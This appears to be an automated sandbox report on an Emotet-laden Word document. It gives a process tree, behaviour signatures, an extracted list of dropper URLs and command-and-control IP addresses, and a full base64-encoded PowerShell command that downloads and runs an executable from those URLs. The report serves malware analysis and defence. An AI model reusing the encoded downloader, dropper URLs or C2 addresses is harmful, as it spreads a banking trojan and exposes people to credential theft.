Overview

overview

10

task1

 

10

Analysis

  • max time kernel
    30s
  • max time network
    24s
  • resource
    win7v191014
  • submitted
    03-02-2020 20:36

Sharing

Copy URL
Twitter E-mail

General

  • Target

    4a1ca5cc92993b021789cf042d7e09f22a82e3f47f3b86d30e05d607ec41f500.doc

  • Sample

    200203-8ntew7b5de

  • SHA256

    4a1ca5cc92993b021789cf042d7e09f22a82e3f47f3b86d30e05d607ec41f500

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://pixtravelers.com/wp-admin/eRLY/
exe.dropper

http://jevelin.dongxanhshop.com/wp-admin/aw2mIU/
exe.dropper

http://new.dongxanhshop.com/wp-admin/52HY48070/
exe.dropper

http://demo.hbmonte.com/qkajzh322j/ApZ405/
exe.dropper

http://redwingdemo.dukaafrica.com/wp-content/Ad4DFk/

Extracted

Family

emotet

C2

71.197.197.100:80

24.167.122.146:8080

104.131.41.185:8080

94.76.247.61:8080

181.36.42.205:443

72.29.55.174:80

82.196.15.205:8080

181.10.204.106:80

217.199.160.224:8080

58.171.38.26:80

200.58.83.179:80

192.241.146.84:8080

190.70.1.69:80

186.15.83.52:8080

216.251.83.79:80

62.75.160.178:8080

181.29.101.13:8080

190.6.193.152:8080

186.200.205.170:80

119.59.124.163:8080
rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4a1ca5cc92993b021789cf042d7e09f22a82e3f47f3b86d30e05d607ec41f500.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:2036
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e JABJAGIAawB5AGMAcgBzAG4AaQA9ACcAUwB1AHgAaAB4AG0AYQBiAG8AJwA7ACQARwBtAG8AZABuAGcAawBtAGwAaQBtAHAAaQAgAD0AIAAnADYANAAxACcAOwAkAEEAaQBsAG0AYQB2AGQAZABpAHAAeABoAD0AJwBaAGgAaABuAHkAZgBpAGcAbwBwACcAOwAkAFEAdAByAGsAZgBwAHoAdgB5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAG0AbwBkAG4AZwBrAG0AbABpAG0AcABpACsAJwAuAGUAeABlACcAOwAkAEwAYQBwAGgAZwByAGUAaQBrAD0AJwBGAHMAcgBmAHIAeQBkAHgAcQBqAG0AJwA7ACQASgBrAHkAcwBjAHcAYQBrAHEAawA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAYgBjAEwAaQBFAE4AVAA7ACQAWQBuAHoAcQBmAHMAegBvAHkAZAB6AG0AZwA9ACcAaAB0AHQAcABzADoALwAvAHAAaQB4AHQAcgBhAHYAZQBsAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAFIATABZAC8AKgBoAHQAdABwADoALwAvAGoAZQB2AGUAbABpAG4ALgBkAG8AbgBnAHgAYQBuAGgAcwBoAG8AcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYQB3ADIAbQBJAFUALwAqAGgAdAB0AHAAOgAvAC8AbgBlAHcALgBkAG8AbgBnAHgAYQBuAGgAcwBoAG8AcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANQAyAEgAWQA0ADgAMAA3ADAALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAGgAYgBtAG8AbgB0AGUALgBjAG8AbQAvAHEAawBhAGoAegBoADMAMgAyAGoALwBBAHAAWgA0ADAANQAvACoAaAB0AHQAcAA6AC8ALwByAGUAZAB3AGkAbgBnAGQAZQBtAG8ALgBkAHUAawBhAGEAZgByAGkAYwBhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AQQBkADQARABGAGsALwAnAC4AIgBTAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAYQBzAHgAawB1AHUAdgB5AHcAawBkAD0AJwBJAGYAYwBvAGEAagBxAGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEsAYgB2AGMAcgB3AG4AcAB3AHkAIABpAG4AIAAkAFkAbgB6AHEAZgBzAHoAbwB5AGQAegBtAGcAKQB7AHQAcgB5AHsAJABKAGsAeQBzAGMAdwBhAGsAcQBrAC4AIgBkAG8AYAB3AE4ATABgAE8AYQBEAGYASQBsAEUAIgAoACQASwBiAHYAYwByAHcAbgBwAHcAeQAsACAAJABRAHQAcgBrAGYAcAB6AHYAeQApADsAJABBAHEAaABrAHMAeAB2AHoAbgA9ACcARwB6AGcAeQBxAHcAdgBoAHcAaAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAFEAdAByAGsAZgBwAHoAdgB5ACkALgAiAGwAZQBgAE4ARwBgAFQASAAiACAALQBnAGUAIAAyADEAMwA4ADkAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBgAEUAQQBgAFQAZQAiACgAJABRAHQAcgBrAGYAcAB6AHYAeQApADsAJABWAHIAbwB1AGwAZABiAHMAZgBsAHgAdQBtAD0AJwBBAGEAawBwAHEAbwBjAGcAJwA7AGIAcgBlAGEAawA7ACQASgBuAHYAdQB6AHkAeQBtAGsAcABhAD0AJwBOAGsAdgB1AGEAbgBpAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBnAHYAdwBtAG0AaQBzAGwAcwA9ACcAUQBnAHgAZgBtAHoAaABjACcA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    PID:1620
  • C:\Users\Admin\641.exe
    C:\Users\Admin\641.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    PID:544
    • C:\Users\Admin\641.exe
      --ba05ca91
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Suspicious use of SetWindowsHookEx
      • Drops file in System32 directory
      PID:1868

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\641.exe
    Download Submit

  • C:\Users\Admin\641.exe
    Download Submit

  • C:\Users\Admin\641.exe
    Download Submit

  • memory/544-10-0x00000000003B0000-0x00000000003C6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/1868-12-0x00000000003C0000-0x00000000003D6000-memory.dmp

    Filesize

    88KB

    Download

  • memory/1868-13-0x0000000000400000-0x000000000047D000-memory.dmp

    Filesize

    500KB

    Download

  • memory/2036-0-0x0000000006EB0000-0x0000000006FB0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2036-2-0x0000000007C40000-0x0000000007C44000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2036-5-0x0000000009D10000-0x0000000009D14000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2036-6-0x000000000AD90000-0x000000000AD94000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2036-7-0x000000000AD90000-0x000000000AD94000-memory.dmp

    Filesize

    16KB

    Download